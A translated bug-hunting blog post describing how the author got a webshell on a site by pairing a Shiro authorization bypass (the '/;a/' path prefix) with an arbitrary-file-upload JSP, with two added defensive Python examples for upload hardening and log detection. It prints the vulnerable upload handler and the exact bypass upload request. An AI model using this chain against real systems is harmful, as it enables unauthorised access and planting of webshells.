Shells I've popped over the years: the Shiro authorization bypass one
阿新 • Published: 2020-07-24
0x01 Shiro deserialization command execution?
Routine bug hunting; the Burp Suite Shiro plugin raised an alert.
Neither ShiroExploit's dnslog mode nor its static-file echo mode detected anything. The Tomcat echo didn't work either.
0x02 Arbitrary file upload?
Opening the site gives a login form.
Captured the request and found the captcha wasn't being validated; brute-forced for a while but nothing came out. Noticed that
the framework is a certain "admin" framework; I googled what vulnerabilities it has and found a post
saying the file plugins/uploadify/uploadFile.jsp exists and that it allows arbitrary file upload:
<%@ page language="java" contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"%>
<%@ page import="java.io.*, java.util.*, org.apache.commons.fileupload.*, java.util.*" %>
<%@ page import="org.apache.commons.fileupload.disk.*, org.apache.commons.fileupload.servlet.*" %>
<%!
public void upload(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
    String savePath = this.getServletConfig().getServletContext().getRealPath("");
    savePath = savePath + request.getParameter("uploadPath");
    File f1 = new File(savePath); // the value of uploadPath is taken straight from the request here
    System.out.println(request.getParameter("uploadPath"));
    if (!f1.exists()) {
        f1.mkdirs();
    }
    DiskFileItemFactory fac = new DiskFileItemFactory();
    ServletFileUpload upload = new ServletFileUpload(fac);
    upload.setHeaderEncoding("utf-8");
    List fileList = null;
    try {
        fileList = upload.parseRequest(request);
    } catch (FileUploadException ex) {
        return;
    }
    String fileNmae = request.getParameter("fileNmae");
    Iterator<FileItem> it = fileList.iterator();
    String name = "";
    String extName = "";
    while (it.hasNext()) {
        FileItem item = it.next();
        if (!item.isFormField()) {
            name = item.getName();
            long size = item.getSize();
            String type = item.getContentType();
            //System.out.println(size + " " + type);
            if (name == null || name.trim().equals("")) {
                continue;
            }
            // file extension:
            if (name.lastIndexOf(".") >= 0) {
                extName = name.substring(name.lastIndexOf("."));
            }
            File file = null;
            if (null != fileNmae && !"".equals(fileNmae)) {
                file = new File(savePath + fileNmae);
            } else {
                do {
                    if (null != fileNmae && !"".equals(fileNmae)) {
                        file = new File(savePath + fileNmae);
                    } else {
                        name = new java.text.SimpleDateFormat("yyyyMMddhhmmss").format(new Date()); // current date
                        name = name + (int) (Math.random() * 90000 + 10000);
                        file = new File(savePath + name + extName);
                    }
                } while (file.exists());
            }
            File saveFile = new File(savePath + name + extName);
            try {
                item.write(saveFile);
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    }
    response.getWriter().print((name.trim() + extName.trim()).trim());
}
%>
<% upload(request, response); %>
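The handler above trusts three things it should not: the uploadPath parameter is concatenated onto getRealPath("") without any confinement, the stored filename is either the client's fileNmae value or the client's original extension, and no extension allow-list exists. As an added example (not code from the post or from the framework), here is that missing validation reimplemented in Python so it runs stand-alone: the client-supplied sub-directory is confined to a fixed upload root, the stored name is generated server-side, and the extension is checked against an allow-list. UPLOAD_ROOT, ALLOWED_EXT and the function names are assumptions of this example.

```python
import os
import re
import secrets
import time
from typing import Optional, Tuple

# Assumed for this example: a fixed directory that uploads may land in.
# The JSP above instead uses getRealPath("") + uploadPath, i.e. anywhere in the webapp.
UPLOAD_ROOT = os.path.realpath("/var/www/app/upload")

# Allow-list of extensions the endpoint accepts; nothing the servlet
# container would execute (.jsp, .jspx, .jspf) is in it.
ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}

# A sub-directory name may only contain these characters: no '.', so no '..',
# no ';', no NUL, no backslash.
SAFE_SUBDIR = re.compile(r"^[A-Za-z0-9_/-]*$")


class UploadRejected(ValueError):
    """Raised when a request fails one of the checks below."""


def resolve_upload_dir(upload_path: str, root: str = UPLOAD_ROOT) -> str:
    """Confine the client-supplied uploadPath to a sub-directory of root."""
    if not SAFE_SUBDIR.match(upload_path):
        raise UploadRejected("uploadPath contains disallowed characters")
    target = os.path.realpath(os.path.join(root, upload_path.lstrip("/")))
    # Defence in depth: after normalisation the target must still sit under root.
    if os.path.commonpath([root, target]) != root:
        raise UploadRejected("uploadPath escapes the upload root")
    return target


def server_side_name(client_filename: str) -> str:
    """Build the stored name from a timestamp and a CSPRNG suffix; keep only the extension."""
    base = os.path.basename(client_filename.replace("\\", "/"))
    ext = os.path.splitext(base)[1].lower()
    if ext not in ALLOWED_EXT:
        raise UploadRejected(f"extension {ext!r} not allowed")
    return f"{time.strftime('%Y%m%d%H%M%S')}{secrets.token_hex(4)}{ext}"


def plan_upload(upload_path: str, client_filename: str,
                client_name_param: Optional[str] = None) -> Tuple[str, str]:
    """Return (directory, filename) the file may be written to, or raise UploadRejected.

    client_name_param stands in for the JSP's fileNmae parameter. The hardened
    version never lets the client choose the stored name, so it is ignored.
    """
    directory = resolve_upload_dir(upload_path)
    return directory, server_side_name(client_filename)


if __name__ == "__main__":
    # Constructed inputs: the post's request, a traversal attempt, and a benign image.
    for path, fname in [("/plugins/uploadify/", "2204249.jsp"),
                        ("../../ROOT/", "a.png"),
                        ("avatars/", "me.PNG")]:
        try:
            print(path, fname, "->", plan_upload(path, fname))
        except UploadRejected as e:
            print(path, fname, "-> rejected:", e)
```

With these checks the request shown later in the post is refused twice over: the .jsp extension is not on the allow-list, and even an allowed extension would be stored under a server-chosen name inside UPLOAD_ROOT, never in a directory the client picked. Serving the upload directory with JSP execution disabled (or from a separate host) is the remaining layer this snippet does not cover.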
Tried to access the file and got a 302 redirect saying I wasn't logged in.
Then it occurred to me that this site uses Shiro: the deserialization RCE had been patched, but the Shiro authorization bypass disclosed just recently surely hadn't been patched yet. For details see this article: https://mp.weixin.qq.com/s/yb6Tb7zSTKKmBlcNVz0MBA
We use
/;a/plugins/uploadify/uploadFile.jsp
to bypass Shiro's access control; note that the status code is now 200.
Combined with the code shown earlier, two parameters are needed to build the upload request.
The upload reported success, but the file was nowhere to be found.
On a closer look, request.getParameter("uploadPath") cannot read parameters from the multipart body, so I built the upload request again:
POST /;a/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/ HTTP/1.1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryQDeBiVqfe6p3FMnJ

------WebKitFormBoundaryQDeBiVqfe6p3FMnJ
Content-Disposition: form-data; name="imgFile"; filename="2204249.jsp"
Content-Type: image/jpeg

test
------WebKitFormBoundaryQDeBiVqfe6p3FMnJ--
Shell obtained.
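From the defender's side, the whole chain leaves a distinctive trace in the access log. The reason the bypass works at all is a normalization mismatch: Tomcat strips ";param" path parameters from every segment before routing, so "/;a/plugins/uploadify/uploadFile.jsp" reaches the same JSP as "/plugins/uploadify/uploadFile.jsp", while a filter that normalizes the URI differently does not recognise the protected path. The added example below (not part of the original post) reconstructs the container's view of the path and flags requests where a ";" segment sits in front of a protected prefix and the response was 200. The log lines, the PROTECTED_PREFIXES list and the log format regex are constructed for this example; they are not from the target in the post.

```python
import re
from dataclasses import dataclass
from typing import List
from urllib.parse import unquote, urlsplit

# Constructed Tomcat-style access log lines mirroring the sequence in the post
# (302 on the direct path, 200 via the ';' prefix, then the upload POST),
# plus a benign jsessionid path parameter that must not be flagged.
SAMPLE_LOG = """\
10.0.0.5 - - [24/Jul/2020:10:00:01 +0800] "GET /plugins/uploadify/uploadFile.jsp HTTP/1.1" 302 0
10.0.0.5 - - [24/Jul/2020:10:00:07 +0800] "GET /;a/plugins/uploadify/uploadFile.jsp HTTP/1.1" 200 512
10.0.0.5 - - [24/Jul/2020:10:00:15 +0800] "POST /;a/plugins/uploadify/uploadFile.jsp?uploadPath=/plugins/uploadify/ HTTP/1.1" 200 23
10.0.0.9 - - [24/Jul/2020:10:01:00 +0800] "GET /static/app.css;jsessionid=ABC123 HTTP/1.1" 200 8840
10.0.0.9 - - [24/Jul/2020:10:01:02 +0800] "GET /login HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+) \S+" (?P<status>\d{3}) '
)

# Assumed for this example: prefixes the application expects its auth filter to protect.
PROTECTED_PREFIXES = ("/plugins/", "/admin/")


@dataclass
class Finding:
    ip: str
    raw_uri: str
    served_path: str
    status: int
    reason: str


def container_path(raw_uri: str) -> str:
    """Approximate the path the servlet container resolves for a request URI.

    Path parameters (';...') are dropped from each segment, percent-encoding is
    decoded, and '.' / '..' segments are collapsed.
    """
    path = urlsplit(raw_uri).path
    segments: List[str] = []
    for seg in unquote(path).split("/"):
        seg = seg.split(";", 1)[0]
        if seg in ("", "."):
            continue
        if seg == "..":
            if segments:
                segments.pop()
            continue
        segments.append(seg)
    return "/" + "/".join(segments)


def has_path_parameter(raw_uri: str) -> bool:
    """True if any path segment carries a ';' parameter."""
    return any(";" in seg for seg in urlsplit(raw_uri).path.split("/"))


def scan(log_text: str, protected=PROTECTED_PREFIXES) -> List[Finding]:
    """Flag 200 responses where a ';' path parameter precedes a protected path."""
    findings: List[Finding] = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        raw = m["uri"]
        served = container_path(raw)
        status = int(m["status"])
        if not served.startswith(protected):
            continue
        # The raw path and the served path differ only by a path parameter and the
        # request still got through: the filter/container mismatch in action.
        if served != urlsplit(raw).path and has_path_parameter(raw) and status == 200:
            findings.append(Finding(m["ip"], raw, served, status,
                                    "path parameter in front of a protected path, served 200"))
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ip} {f.raw_uri} -> {f.served_path} [{f.status}] {f.reason}")
```

On the sample log this reports the two "/;a/" requests from 10.0.0.5 and nothing else: the jsessionid parameter on /static/app.css is a path parameter too, but the served path is not under a protected prefix. The same container-side normalization is what an authorization filter should apply before matching, which is the fix the Shiro upgrade referenced in the post delivers; until then, a rule like this on the reverse proxy or SIEM at least makes the attempt visible.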